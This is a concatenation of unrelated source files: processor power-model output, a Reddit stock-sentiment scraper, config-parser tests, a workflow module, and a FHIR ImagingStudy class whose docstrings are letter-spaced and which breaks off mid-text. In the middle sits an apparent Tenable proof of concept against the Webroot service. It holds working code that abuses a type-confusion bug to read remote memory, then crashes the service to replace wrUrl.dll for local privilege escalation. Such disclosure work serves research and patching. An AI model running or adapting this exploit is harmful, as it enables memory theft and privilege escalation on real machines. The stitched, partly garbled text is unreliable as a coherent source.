Leakage with power gating': 0.0175885, 'Renaming Unit/Free List/Area': 0.0340654, 'Renaming Unit/Free List/Gate Leakage': 2.5481e-05, 'Renaming Unit/Free List/Peak Dynamic': 0.0306032, 'Renaming Unit/Free List/Runtime Dynamic': 0.0150015, 'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144, 'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064, 'Renaming Unit/Gate Leakage': 0.00708398, 'Renaming Unit/Int Front End RAT/Area': 0.0941223, 'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242, 'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965, 'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.135244, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488, 'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228, 'Renaming Unit/Peak Dynamic': 3.58947, 'Renaming Unit/Runtime Dynamic': 0.379633, 'Renaming Unit/Subthreshold Leakage': 0.0552466, 'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461, 'Runtime Dynamic': 5.01827, 'Subthreshold Leakage': 6.16288, 'Subthreshold Leakage with power gating': 2.55328}], 'DRAM': {'Area': 0, 'Gate Leakage': 0, 'Peak Dynamic': 0.07524708409127963, 'Runtime Dynamic': 0.07524708409127963, 'Subthreshold Leakage': 4.252, 'Subthreshold Leakage with power gating': 4.252}, 'L3': [{'Area': 61.9075, 'Gate Leakage': 0.0484137, 'Peak Dynamic': 0.0323138, 'Runtime Dynamic': 0.0200653, 'Subthreshold Leakage': 6.80085, 'Subthreshold Leakage with power gating': 3.32364}], 'Processor': {'Area': 191.908, 'Gate Leakage': 1.53485, 'Peak Dynamic': 93.1015, 'Peak Power': 126.214, 'Runtime Dynamic': 27.3164, 'Subthreshold Leakage': 31.5774, 'Subthreshold Leakage with power gating': 13.9484, 'Total Cores/Area': 128.669, 'Total Cores/Gate Leakage': 1.4798, 'Total Cores/Peak Dynamic': 93.0692, 'Total Cores/Runtime Dynamic': 27.2963, 'Total Cores/Subthreshold Leakage': 24.7074, 'Total Cores/Subthreshold Leakage with power gating': 10.2429, 'Total L3s/Area': 61.9075, 'Total L3s/Gate Leakage': 0.0484137, 'Total L3s/Peak Dynamic': 0.0323138, 'Total L3s/Runtime Dynamic': 0.0200653, 'Total L3s/Subthreshold Leakage': 6.80085, 'Total L3s/Subthreshold Leakage with power gating': 3.32364, 'Total Leakage': 33.1122, 'Total NoCs/Area': 1.33155, 'Total NoCs/Gate Leakage': 0.00662954, 'Total NoCs/Peak Dynamic': 0.0, 'Total NoCs/Runtime Dynamic': 0.0, 'Total NoCs/Subthreshold Leakage': 0.0691322, 'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
<filename>PythonScraper/RedditScraper.py import praw import csv import re import json import requests from textblob import TextBlob import nltk # Download VADER, if not downloaded # nltk.download('vader_lexicon') from nltk.sentiment.vader import SentimentIntensityAnalyzer sia = SentimentIntensityAnalyzer() client_ids="YkfkaYL9JKVtOw" client_secrets="<KEY>" user_agents="James" reddit=praw.Reddit(client_id=client_ids,client_secret=client_secrets,user_agent=user_agents,username=usernames,password=<PASSWORD>) class StockPost(object): def __init__(self, postID, postURL, ups, text,downs, numComments, stock,positive,negative,neutral): self.postID = postID self.url = postURL self.stock = stock self.ups = ups self.text=text self.downs = downs self.numComments = numComments self.positive=positive self.negative=negative self.neutral=neutral def jsonEnc(self): return {'stock': self.stock, 'postID': self.postID, 'postURL': self.url, 'ups': self.ups, 'downs': self.downs, 'text':self.text, 'numComments': self.numComments,'positive':self.positive,'neutral':self.neutral,'negative':self.negative} def jsonDefEncoder(obj): if hasattr(obj, 'jsonEnc'): return obj.jsonEnc() else: #some default behavior return obj.__dict__ def text_blob_sentiment(review, sub_entries_textblob,stockSentiment,stock): analysis = TextBlob(review) if analysis.sentiment.polarity >= 0.0001: if analysis.sentiment.polarity > 0: sub_entries_textblob['positive'] = sub_entries_textblob['positive'] + 1 stockSentiment[stock]['positive']=stockSentiment[stock]['positive']+1 return 'Positive' elif analysis.sentiment.polarity <= -0.0001: if analysis.sentiment.polarity <= 0: sub_entries_textblob['negative'] = sub_entries_textblob['negative'] + 1 stockSentiment[stock]['negative']=stockSentiment[stock]['negative']+1 return 'Negative' else: sub_entries_textblob['neutral'] = sub_entries_textblob['neutral'] + 1 stockSentiment[stock]['neutral']=stockSentiment[stock]['neutral']+1 return 'Neutral' def merge(a, b, path=None): "merges b into a" if path is None: path = [] for key in b: if key in a: for item in b[key]: a[key][item] = b[key][item] return a # sentiment analysis function for VADER tool def nltk_sentiment(review, sub_entries_nltk,stockSentiment,stock): vs = sia.polarity_scores(review) if not vs['neg'] > 0.05: if vs['pos'] - vs['neg'] > 0: sub_entries_nltk['positive'] = sub_entries_nltk['positive'] + 1 stockSentiment[stock]['positive']=stockSentiment[stock]['positive']+1 return 'Positive' else: sub_entries_nltk['neutral'] = sub_entries_nltk['neutral'] + 1 stockSentiment[stock]['neutral']=stockSentiment[stock]['neutral']+1 return 'Neutral' elif not vs['pos'] > 0.05: if vs['pos'] - vs['neg'] <= 0: sub_entries_nltk['negative'] = sub_entries_nltk['negative'] + 1 stockSentiment[stock]['negative']=stockSentiment[stock]['negative']+1 return 'Negative' else: sub_entries_nltk['neutral'] = sub_entries_nltk['neutral'] + 1 stockSentiment[stock]['neutral']=stockSentiment[stock]['neutral']+1 return 'Neutral' else: sub_entries_nltk['neutral'] = sub_entries_nltk['neutral'] + 1 stockSentiment[stock]['neutral']=stockSentiment[stock]['neutral']+1 return 'Neutral' def update_stock(stockTickers,stock,post): stockTickers[str(stock)]['postID'].append(post.id) stockTickers[str(stock)]['postURL'].append(post.permalink) stockTickers[str(stock)]['text'].append(post.selftext) stockTickers[str(stock)]['ups']+=post.ups stockTickers[str(stock)]['downs']+=post.downs stockTickers[str(stock)]['numComments']+=post.num_comments class SubredditScraper: def __init__(self, sub, sort='new', lim=900): self.sub = sub self.sort = sort self.lim = lim print( f'SubredditScraper instance created with values ' f'sub = {sub}, sort = {sort}, lim = {lim}') def set_sort(self): if self.sort == 'new': return self.sort, reddit.subreddit(self.sub).new(limit=self.lim) elif self.sort == 'top': return self.sort, reddit.subreddit(self.sub).top(limit=self.lim) elif self.sort == 'hot': return self.sort, reddit.subreddit(self.sub).hot(limit=self.lim) else: self.sort = 'hot' print('Sort method was not recognized, defaulting to hot.') return self.sort, reddit.subreddit(self.sub).hot(limit=self.lim) def get_posts(self): sub_entries_textblob = {'negative': 0, 'positive' : 0, 'neutral' : 0} sub_entries_nltk = {'negative': 0, 'positive' : 0, 'neutral' : 0} stockSentiment={} stockTickers = {} with open('tickers.csv', mode='r') as infile: reader = csv.reader(infile) for row in reader: row[0]=row[0][:row[0].index(",")] stockTickers[row[0]] = {'stock': row[0], 'postID':[], 'postURL': [], 'ups': 0, 'downs': 0, 'text':[], 'numComments': 0,'positive':0,'neutral':0,'negative':0} stockSentiment[row[0]] = {'negative': 0, 'positive' : 0, 'neutral' : 0} """Get unique posts from a specified subreddit.""" # Attempt to specify a sorting method. sort, subreddit = self.set_sort() print(f'Collecting information from r/{self.sub}.') mentionedStocks = [] i = 0 for post in subreddit: i = i + 1 print(i,post.title,post.link_flair_text) if post.link_flair_text != 'Meme': for stock in stockTickers.keys(): if(re.search(r'\s+\$?' + stock + r'\$?\s+', post.selftext) or re.search(r'\s+\$?' + stock + r'\$?\s+', post.title)): print("/n",stock) text_blob_sentiment(post.title, sub_entries_textblob,stockSentiment,stock) nltk_sentiment(post.title, sub_entries_nltk,stockSentiment,stock) update_stock(stockTickers,stock,post) # for stock in stockTickers: # if (len(stockTickers[stock]) > 0): # for post in stockTickers[stock]: # mentionedStocks.append(stockTickers[stock][post]) #json_object = json.dumps(mentionedStocks, default=jsonDefEncoder, indent = 4) # print(json_object) merge(stockTickers,stockSentiment) print(stockTickers['GME']) headers = {'Content-type':'application/json', 'Accept':'application/json' } # r = requests.post("https://localhost:44360/api/RedditPostsAdmin", data=json_object, verify=False, headers=headers) # print(r.status_code) if __name__ == '__main__': SubredditScraper('wallstreetbets', lim=200, sort='hot').get_posts()
''' <NAME> 03-13-2020 Tenable WebRootPoC LPE/MemoryLeak ''' import socket import json import sys, getopt import struct import shutil import os import time HOST = '10.0.2.5' # Webroot Service IP PORT = 27019 # Webroot Service Port class UnencodableByte(Exception): pass ''' Represents address and data found at address ''' class MemoryData: def __init__(self, address, data): self.address = address self.data = data def Usage(): print("Usage: WebRootPoc.py [OPTION]\r\n -r\t<32-bit Memory Address in Hex>\tReads Memory from Remote Webroot Instance\r\n -e\tLocal Privilege Escalation") def intToByteStr(hexval): return '{:02x}'.format(hexval) ''' @:param - Address bytes @:returns MemoryData representing address and data found in address Crafts HTTP request that satisfies WebRoot service parsing. Abuses a Type-Confusion vulnerability when "DATA" list is traversed. Webroot routine will expect list elements to be type JSON_OBJ and key into them accordingly. By embedding a [\"URL\"] list element, Webroot JSON parser will dereference this as if it were JSON obj looking for "URL" key/value pair and trigger a read-what-where. This can be leaked back in the URL field of the server's response. JSON_KEY on List obj (Bug), looks up "URL" key and return value pair | | V ___________ ___________ | LIST_OBJ | --- Finds "URL" key match --> | String | | | | "URL" | ------------ ----------- | | JSON_Key_Value returns value offset of buffer after matching URL V ______________________ _____________________ | Type Confusion | -------------------------> | \x41\x41\x41\x41 | - Supposed to be address of key "value", but we control this pointer via crafted string | returns string | | ----------------- | | of next List element| | 11111111111111 | - Object type field is padded with "1"s to spoof expected type to pass Webroot check ----------------------- ---------------------- ​ ''' def LeakMemory(addr_bytes): # Raise Exception if we cant encode address addr_bytes = [addr if int(addr, 16) <= 0x7f else None for addr in addr_bytes] if(None in addr_bytes): raise UnencodableByte http_response = '' http_lines = [] http_lines.append("POST / HTTP/1.1") http_lines.append("\r\n") http_lines.append("Content-Type: application/urltree; charset=utf-8") http_lines.append("\r\n") http_lines.append("Content-Length:0") http_lines.append("\r\n\r\n") http_lines.append('{{"VER":1, "OP":1, "DATA":[["URL"], ["\\u00{}\\u00{}\\u00{}\\u00{}11111111111111111111"]], ' '"IDATA":[{{"TOKEN":"1","BCRI":"1"}}], "BRWSR":"Chrome"}}'.format(addr_bytes[0], addr_bytes[1], addr_bytes[2], addr_bytes[3])) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((HOST, PORT)) s.sendall("".join(http_lines).encode()) http_response = s.recv(1024) if http_response == b'': return None payload = http_response.decode('latin1').split('\r\n\r\n')[1] # Get payload from HTTP response try: json_response = json.loads(payload) except: url_field = payload.split('URL')[1] try: url_field = json_response['DATA'][0]['URL'] except: return None if url_field == '': return None return MemoryData(struct.unpack('>I', struct.pack('<I', int("".join(addr_bytes),16)))[0], url_field) ''' @param address - Address integer to read memory from. Address must not contain bytes greater than 0x7f. @returns - List of MemoryData objs This accepts a 32-bit address thats contents will be leaked from WebRoot server. This function will raise an Exception of "Unencodable Byte" if individual address byte exceeds 0x7f, as bytes in that range are unencodable. ''' def ReadMemory(address): print("\033[94mReading Memory starting @{:08x}...".format(address)) addr_bytes = [intToByteStr(address & 0x000000ff), intToByteStr(address >> 8 & 0x0000ff), intToByteStr(address >> 16 & 0x00ff), intToByteStr(address >> 24)] MemoryDatas = [] for i in range(0, 0x7f): try: memDat = LeakMemory(addr_bytes) except UnencodableByte: print("Unencodable Byte found in supplied address. All bytes must be below 0x80") sys.exit(-1) if memDat is None: addr_bytes[0] = intToByteStr(int(addr_bytes[0], 16) + 1) # incriment address continue addr_bytes[0] = intToByteStr(int(addr_bytes[0], 16) + len(memDat.data)) # incriment address print("\033[92m@{:08x} - {}\x1b[0m".format(memDat.address, memDat.data)) if int(addr_bytes[0], 16) > 0x7f: return MemoryDatas.append(memDat) return MemoryDatas ''' Local Privilege Escalation. By Crashing the AV service via Access Violation in our Type Confusion bug, we can replace the wrUrl.dll in %PROGRAMDATA%\WrData\PKG with our own. This is done by renaming the "wrUrl" directory. ''' def LPE(): try: wrUrl_dll = open('wrUrl.dll', 'rb') except: print("Cannot find mock wrUrl.dll. Ensure it resides in current directory") sys.exit(-1) PKGPath = os.path.expandvars("%PROGRAMDATA%\WRData\PKG") PKGPath2 = os.path.expandvars("%PROGRAMDATA%\WRData\PKG2") try: ReadMemory(0) # Trigger Access Violation except ConnectionResetError: pass time.sleep(3) os.rename(PKGPath, PKGPath2) shutil.copytree(PKGPath2, PKGPath) shutil.copyfile('wrUrl.dll', os.path.join(PKGPath, 'wrUrl.dll')) # replace dll with our own def main(argv): if len(argv) == 0: Usage() try: opts, args = getopt.getopt(argv, "r:e") except getopt.GetoptError: Usage() sys.exit(-1) for opt, arg in opts: if opt == '-r': try: ReadMemory(int(arg, 16)) except ConnectionResetError: print("Ooops. Didnt get response back from Webroot, probably crashed it due to Access Violation. Make sure" "Address is valid in remote WebRoot process or just try again after service auto-restarts") sys.exit(-1) elif opt == '-e': LPE() if __name__ == "__main__": main(sys.argv[1:])
# Copyright (c) 2021 <NAME>. # Distributed under the terms of the MIT License. # SPDX-License-Identifier: MIT """ Test the functions that extract content from configuration files. The fixtures (arguments to the test functions) are defined in conftest.py """ import pytest from ..parsers import ( get_pyproject_toml_build, get_setup_cfg_extras, get_setup_cfg_install, parse_requirements, parse_sources, read_pyproject_toml, read_setup_cfg, ) @pytest.mark.parametrize( "source,expected", [ ("install", {"setup.cfg": ["install_requires"], "pyproject.toml": []}), ("build", {"setup.cfg": [], "pyproject.toml": ["build-system"]}), ("extras", {"setup.cfg": ["options.extras_require"], "pyproject.toml": []}), ( "install,extras", { "setup.cfg": ["options.extras_require", "install_requires"], "pyproject.toml": [], }, ), ( "extras,build", { "setup.cfg": ["options.extras_require"], "pyproject.toml": ["build-system"], }, ), ( "build,extras,install", { "setup.cfg": ["options.extras_require", "install_requires"], "pyproject.toml": ["build-system"], }, ), ], ids=["install", "build", "extras", "install,extras", "extras,build", "all"], ) def test_parse_sources(source, expected): "Check the parsing of input data sources" assert expected == parse_sources(source) def test_parse_sources_invalid(): "Should raise an exception on invalid input" with pytest.raises(ValueError) as error: parse_sources("something") assert "'something'" in str(error) def test_read_setup_cfg(setup_cfg, setup_cfg_config): "Check that setup.cfg is read properly" assert setup_cfg_config == read_setup_cfg(setup_cfg) def test_read_pyproject_toml(pyproject_toml, pyproject_toml_config): "Check that pyproject.toml is read properly" assert pyproject_toml_config == read_pyproject_toml(pyproject_toml) def test_parse_requirements_install(setup_cfg_config, setup_cfg_install): "Check that setup.cfg parses install requirements properly" parsed = [ line for line in parse_requirements(setup_cfg_config, ["install_requires"]) if not line.startswith("#") ] assert setup_cfg_install == parsed def test_parse_requirements_extras(setup_cfg_config, setup_cfg_extras): "Check that setup.cfg parses extra requirements properly" parsed = [ line for line in parse_requirements(setup_cfg_config, ["options.extras_require"]) if not line.startswith("#") ] assert setup_cfg_extras == parsed def test_parse_requirements_build(pyproject_toml_config, pyproject_toml_build): "Check that pyproject.toml parses all requirements properly" parsed = [ line for line in parse_requirements(pyproject_toml_config, ["build-system"]) if not line.startswith("#") ] assert pyproject_toml_build == parsed def test_parse_requirements_multiple( setup_cfg_config, setup_cfg_extras, setup_cfg_install ): "Check that setup.cfg parses all requirements properly" parsed = [ line for line in parse_requirements( setup_cfg_config, ["options.extras_require", "install_requires"] ) if not line.startswith("#") ] expected = setup_cfg_extras + setup_cfg_install assert expected == parsed def test_parse_requirements_install_fail(): "Check that parsing fails with an exception" with pytest.raises(ValueError) as error: get_setup_cfg_install({"options": {"something": []}}) assert "Missing 'install_requires'" in str(error) def test_parse_requirements_extras_fail(): "Check that parsing fails with an exception" with pytest.raises(ValueError) as error: get_setup_cfg_extras({"options": {"something": []}}) assert "Missing 'options.extras_require'" in str(error) def test_parse_requirements_build_fail(): "Check that parsing fails with an exception" with pytest.raises(ValueError) as error: get_pyproject_toml_build({"meh": ["something"]}) assert "Missing 'build-system'" in str(error) with pytest.raises(ValueError) as error: get_pyproject_toml_build({"build-system": {"something": []}}) assert "Missing 'requires'" in str(error)
<filename>fiat/stages.py """ base: <NAME> <<EMAIL>> Copyright 2020-2021, <NAME> License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0) Contents: """ from __future__ import annotations import collections.abc import copy import dataclasses import itertools from types import ModuleType from typing import (Any, Callable, ClassVar, Dict, Hashable, Iterable, List, Mapping, MutableMapping, MutableSequence, Optional, Sequence, Set, Tuple, Type, Union) import denovo import more_itertools import fiat @dataclasses.dataclass class Section(denovo.quirks.Factory, denovo.containers.Lexicon): """Section of Outline with connections. Args: contents (MutableMapping[Hashable, Any]]): stored dictionary. Defaults to an empty dict. default_factory (Any): default value to return when the 'get' method is used. Defaults to None. """ contents: Dict[str, Any] = dataclasses.field(default_factory = dict) default_factory: Any = None name: str = None sources: ClassVar[Mapping[Type, str]] = { fiat.shared.bases.settings : 'settings'} """ Properties """ @property def bases(self) -> Dict[str, str]: return self._get_bases() @property def connections(self) -> Dict[str, List[str]]: return self._get_connections() @property def designs(self) -> Dict[str, str]: return self._get_designs() @property def nodes(self) -> List[str]: key_nodes = list(self.connections.keys()) value_nodes = list( itertools.chain.from_iterable(self.connections.values())) return denovo.tools.deduplicate(item = key_nodes + value_nodes) @property def other(self) -> Dict[str, str]: return self._get_other() @property def suffixes(self) -> List[str]: return denovo.shared.library.subclasses.suffixes """ Public Methods """ @classmethod def from_settings(cls, settings: fiat.shared.bases.settings, name: str, **kwargs) -> Section: """[summary] Args: settings (fiat.shared.bases.settings): [description] name (str): Returns: Section: derived from 'settings'. """ return cls(contents = settings[name], name = name, **kwargs) """ Private Methods """ def _get_bases(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ bases = {} for key in self.connections.keys(): prefix, suffix = denovo.tools.divide_string(key) values = denovo.tools.listify(self[key]) if suffix.endswith('s'): base = suffix[:-1] else: base = suffix bases.update(dict.fromkeys(values, base)) return bases def _get_connections(self) -> Dict[str, List[str]]: """[summary] Returns: Dict[str, List[str]]: [description] """ connections = {} keys = [k for k in self.keys() if k.endswith(self.suffixes)] for key in keys: prefix, suffix = denovo.tools.divide_string(key) values = denovo.tools.listify(self[key]) if prefix == suffix: if prefix in connections: connections[self.name].extend(values) else: connections[self.name] = values else: if prefix in connections: connections[prefix].extend(values) else: connections[prefix] = values return connections def _get_designs(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ designs = {} design_keys = [k for k in self.keys() if k.endswith('_design')] for key in design_keys: prefix, suffix = denovo.tools.divide_string(key) designs[prefix] = self[key] return designs def _get_other(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ design_keys = [k for k in self.keys() if k.endswith('_design')] connection_keys = [k for k in self.keys() if k.endswith(self.suffixes)] exclude = design_keys + connection_keys return {k: v for k, v in self.contents.items() if k not in exclude} @dataclasses.dataclass class Outline(denovo.quirks.Factory, denovo.containers.Lexicon): """Organized fiat project settings with convenient accessors. Args: contents (denovo.configuration.TwoLevel): a two-level nested dict for storing configuration options. Defaults to en empty dict. default (Any): default value to return when the 'get' method is used. Defaults to an empty dict. default (Mapping[str, Mapping[str]]): any default options that should be used when a user does not provide the corresponding options in their configuration settings. Defaults to an empty dict. infer_types (bool): whether values in 'contents' are converted to other datatypes (True) or left alone (False). If 'contents' was imported from an .ini file, all values will be strings. Defaults to True. """ contents: MutableMapping[str, Section] = dataclasses.field( default_factory = dict) default_factory: Any = None sources: ClassVar[Mapping[Type, str]] = { fiat.shared.bases.settings : 'settings'} """ Properties """ @property def bases(self) -> Dict[str, str]: return self._get_bases() @property def connections(self) -> Dict[str, List[str]]: return self._get_connections() @property def designs(self) -> Dict[str, str]: return self._get_designs() @property def initialization(self) -> Dict[str, Any]: return self._get_initialization() @property def nodes(self) -> List[str]: key_nodes = list(self.connections.keys()) value_nodes = list( itertools.chain.from_iterable(self.connections.values())) return denovo.tools.deduplicate(item = key_nodes + value_nodes) @property def other(self) -> Dict[str, Any]: return self._get_other() """ Public Methods """ @classmethod def from_settings(cls, settings: fiat.shared.bases.settings, **kwargs) -> Outline: """[summary] Args: Returns: Outline: derived from 'settings'. """ return fiat.workshop.settings_to_outline(settings = settings, **kwargs) """ Private Methods """ def _get_bases(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ bases = dict(zip(self.nodes, self.nodes)) for section in self.values(): bases.update(section.bases) return bases def _get_connections(self) -> Dict[str, List[str]]: """[summary] Returns: Dict[str, List[str]]: [description] """ connections = {} for section in self.values(): for key, links in section.connections.items(): if key in connections: connections[key].extend(links) else: connections[key] = links return connections def _get_designs(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ designs = {} for section in self.values(): designs.update(section.designs) return designs def _get_initialization(self) -> Dict[str, Dict[str, Any]]: """[summary] Returns: Dict[str, Dict[str, Any]]: [description] """ initialization = collections.defaultdict(dict) keys = [k.endswith('_parameters') for k in self.keys] for key in keys: prefix, suffix = denovo.tools.divide_string(key) initialization[prefix] = self[key] return initialization def _get_other(self) -> Dict[str, str]: """[summary] Returns: Dict[str, str]: [description] """ other = {} for section in self.values(): other.update(section.other) return other @dataclasses.dataclass class Workflow(denovo.structures.System): """Project workflow implementation as a directed acyclic graph (DAG). Workflow stores its graph as an adjacency list. Despite being called an "adjacency list," the typical and most efficient way to create one in python is using a dict. The keys of the dict are the nodes and the values are sets of the hashable summarys of other nodes. Workflow internally supports autovivification where a set is created as a value for a missing key. Args: contents (Adjacency): an adjacency list where the keys are nodes and the values are sets of hash keys of the nodes which the keys are connected to. Defaults to an empty a defaultdict described in '_DefaultAdjacency'. """ contents: denovo.structures.Adjacency = dataclasses.field( default_factory = lambda: collections.defaultdict(set)) """ Properties """ @property def cookbook(self) -> fiat.base.Cookbook: """Returns the stored workflow as a Cookbook of Recipes.""" return fiat.workshop.workflow_to_cookbook(source = self) """ Dunder Methods """ def __str__(self) -> str: """Returns prettier summary of the stored graph. Returns: str: a formatted str of class information and the contained adjacency list. """ return denovo.tools.beautify(item = self, package = 'fiat')
<reponame>mdx-dev/client-py #!/usr/bin/env python # -*- coding: utf-8 -*- # # Generated from FHIR 4.0.0-a53ec6ee1b (http://hl7.org/fhir/StructureDefinition/ImagingStudy) on 2019-01-22. # 2019, SMART Health IT. from . import domainresource class ImagingStudy(domainresource.DomainResource): """ A s e t o f i m a g e s p r o d u c e d i n s i n g l e s t u d y ( o n e o r m o r e s e r i e s o f r e f e r e n c e s i m a g e s ) . R e p r e s e n t a t i o n o f t h e c o n t e n t p r o d u c e d i n a D I C O M i m a g i n g s t u d y . A s t u d y c o m p r i s e s a s e t o f s e r i e s , e a c h o f w h i c h i n c l u d e s a s e t o f S e r v i c e - O b j e c t P a i r I n s t a n c e s ( S O P I n s t a n c e s - i m a g e s o r o t h e r d a t a ) a c q u i r e d o r p r o d u c e d i n a c o m m o n c o n t e x t . A s e r i e s i s o f o n l y o n e m o d a l i t y ( e . g . X - r a y , C T , M R , u l t r a s o u n d ) , b u t a s t u d y m a y h a v e m u l t i p l e s e r i e s o f d i f f e r e n t m o d a l i t i e s . """ resource_type = "ImagingStudy" def __init__(self, jsondict=None, strict=True): """ Initialize all valid properties. :raises: FHIRValidationError on validation errors, unless strict is False :param dict jsondict: A JSON dictionary to use for initialization :param bool strict: If True (the default), invalid variables will raise a TypeError """ self.basedOn = None """ R e q u e s t f u l f i l l e d . List of `FHIRReference` items (represented as `dict` in JSON). """ self.description = None """ I n s t i t u t i o n - g e n e r a t e d d e s c r i p t i o n . Type `str`. """ self.encounter = None """ E n c o u n t e r w i t h w h i c h t h i s i m a g i n g s t u d y i s a s s o c i a t e d . Type `FHIRReference` (represented as `dict` in JSON). """ self.endpoint = None """ S t u d y a c c e s s e n d p o i n t . List of `FHIRReference` items (represented as `dict` in JSON). """ self.identifier = None """ I d e n t i f i e r s f o r t h e w h o l e s t u d y . List of `Identifier` items (represented as `dict` in JSON). """ self.interpreter = None """ W h o i n t e r p r e t e d i m a g e s . List of `FHIRReference` items (represented as `dict` in JSON). """ self.location = None """ W h e r e I m a g i n g S t u d y o c c u r r e d . Type `FHIRReference` (represented as `dict` in JSON). """ self.modality = None """ A l l s e r i e s m o d a l i t y i f a c t u a l a c q u i s i t i o n m o d a l i t i e s . List of `Coding` items (represented as `dict` in JSON). """ self.note = None """ U s e r - d e f i n e d c o m m e n t s . List of `Annotation` items (represented as `dict` in JSON). """ self.numberOfInstances = None """ N u m b e r o f S t u d y R e l a t e d I n s t a n c e s . Type `int`. """ self.numberOfSeries = None """ N u m b e r o f S t u d y R e l a t e d S e r i e s . Type `int`. """ self.procedureCode = None """ T h e p e r f o r m e d p r o c e d u r e c o d e . List of `CodeableConcept` items (represented as `dict` in JSON). """ self.procedureReference = None """ T h e p e r f o r m e d P r o c e d u r e r e f e r e n c e . Type `FHIRReference` (represented as `dict` in JSON). """ self.reasonCode = None """ W h y t h e s t u d y w a s r e q u e s t e d . List of `CodeableConcept` items (represented as `dict` in JSON). """ self.reasonReference = None """ W h y w a s s t u d y p e r f o r m e d . List of `FHIRReference` items (represented as `dict` in JSON). """ self.referrer = None """ R e f e r r i n g p h y s i c i a n . Type `FHIRReference` (represented as `dict` in JSON). """ self.series = None """ E a c h s t u d y h a s o n e o r m o r e s e r i e s o f i n s t a n c e s . List of `ImagingStudySeries` items (represented as `dict` in JSON). """ self.started = None """ W h e n t h e s t u d y w a s s t a r t e d . Type `FHIRDate` (represented as `str` in JSON). """ self.status = None """ r e g i s t e r e d | a v a i l a b l e | c a n c e l l e d | e n t e r e d - i n - e r r o r | u n k n o w n . Type `str`. """ self.subject = None """ W h o o r w h a t i s t h e s u b j e c t o f t h e s t u d y . Type `FHIRReference` (represented as `dict` in JSON). """ super(ImagingStudy, self).__init__(jsondict=jsondict, strict=strict) def elementProperties(self): js = super(ImagingStudy, self).elementProperties() js.extend([ ("basedOn", "basedOn", fhirreference.FHIRReference, True, None, False), ("description", "description", str, False, None, False), ("encounter", "encounter", fhirreference.FHIRReference, False, None, False), ("endpoint", "endpoint", fhirreference.FHIRReference, True, None, False), ("identifier", "identifier", identifier.Identifier, True, None, False), ("interpreter", "interpreter", fhirreference.FHIRReference, True, None, False), ("location", "location", fhirreference.FHIRReference, False, None, False), ("modality", "modality", coding.Coding, True, None, False), ("note", "note", annotation.Annotation, True, None, False), ("numberOfInstances", "numberOfInstances", int, False, None, False), ("numberOfSeries", "numberOfSeries", int, False, None, False), ("procedureCode", "procedureCode", codeableconcept.CodeableConcept, True, None, False), ("procedureReference", "procedureReference", fhirreference.FHIRReference, False, None, False), ("reasonCode", "reasonCode", codeableconcept.CodeableConcept, True, None, False), ("reasonReference", "reasonReference", fhirreference.FHIRReference, True, None, False), ("referrer", "referrer", fhirreference.FHIRReference, False, None, False), ("series", "series", ImagingStudySeries, True, None, False), ("started", "started", fhirdate.FHIRDate, False, None, False), ("status", "status", str, False, None, True), ("subject", "subject", fhirreference.FHIRReference, False, None, True), ]) return js from . import backboneelement class ImagingStudySeries(backboneelement.BackboneElement): """ E a c h s t u d y h a s o n e o r m o r e s e r i e s o f i n s t a n c e s . E a c h s t u d y h a s o n e o r m o r e s e r i e s o f i m a g e s o r o t h e r c o n t e n t . """ resource_type = "ImagingStudySeries" def __init__(self, jsondict=None, strict=True): """ Initialize all valid properties. :raises: FHIRValidationError on validation errors, unless strict is False :param dict jsondict: A JSON dictionary to use for initialization :param bool strict: If True (the default), invalid variables will raise a TypeError """ self.bodySite = None """ B o d y p a r t e x a m i n e d . Type `Coding` (represented as `dict` in JSON). """ self.description = None """ A s h o r t h u m a n r e a d a b l e s u m m a r y o f t h e s e r i e s . Type `str`. """ self.endpoint = None """ S e r i e s a c c e s s e n d p o i n t . List of `FHIRReference` items (represented as `dict` in JSON). """ self.instance = None """ A s i n g l e S O P i n s t a n c e f r o m t h e s e r i e s . List of `ImagingStudySeriesInstance` items (represented as `dict` in JSON). """ self.laterality = None """ B o d y p a r t l a t e r a l i t y . Type `Coding` (represented as `dict` in JSON). """ self.modality = None """ T h e m o d a l i t y o f t h e i n s t a n c e s i n t h e s e r i e s . Type `Coding` (represented as `dict` in JSON). """ self.number = None """ N u m e r i c i d e n t i f i e r o f t h i s s e r i e s . Type `int`. """ self.numberOfInstances = None """ N u m b e r o f S e r i e s R e l a t e d I n s t a n c e s . Type `int`. """ self.performer = None """ W h o p e r f o r m e d t h e s e r i e s . List of `ImagingStudySeriesPerformer` items (represented as `dict` in JSON). """ self.specimen = None """ S p e c i m e n i m a g e d . List of `FHIRReference` items (represented as `dict` in JSON). """ self.started = None """ W h e n t h e s e r i e s s t a r t e d . Type `FHIRDate` (represented as `str` in JSON). """ self.uid = None """ D I C O M S e r i e s I n s t a n c e U I D f o r t h e s e r i e s . Type `str`. """ super(ImagingStudySeries, self).__init__(jsondict=jsondict, strict=strict) def elementProperties(self): js = super(ImagingStudySeries, self).elementProperties() js.extend([ ("bodySite", "bodySite", coding.Coding, False, None, False), ("description", "description", str, False, None, False), ("endpoint", "endpoint", fhirreference.FHIRReference, True, None, False), ("instance", "instance", ImagingStudySeriesInstance, True, None, False), ("laterality", "laterality", coding.Coding, False, None, False), ("modality", "modality", coding.Coding, False, None, True), ("number", "number", int, False, None, False), ("numberOfInstances", "numberOfInstances", int, False, None, False), ("performer", "performer", ImagingStudySeriesPerformer, True, None, False), ("specimen", "specimen", fhirreference.FHIRReference, True, None, False), ("started", "started", fhirdate.FHIRDate, False, None, False), ("uid", "uid", str, False, None, True), ]) return js class ImagingStudySeriesInstance(backboneelement.BackboneElement): """ A s i n g l e S O P i n s t a n c e f r o m t h e s e r i e s . A s i n g l e S O P i n s t a n c e w i t h i n t h e s e r i e s , e . g . a n i m a g e , o r p 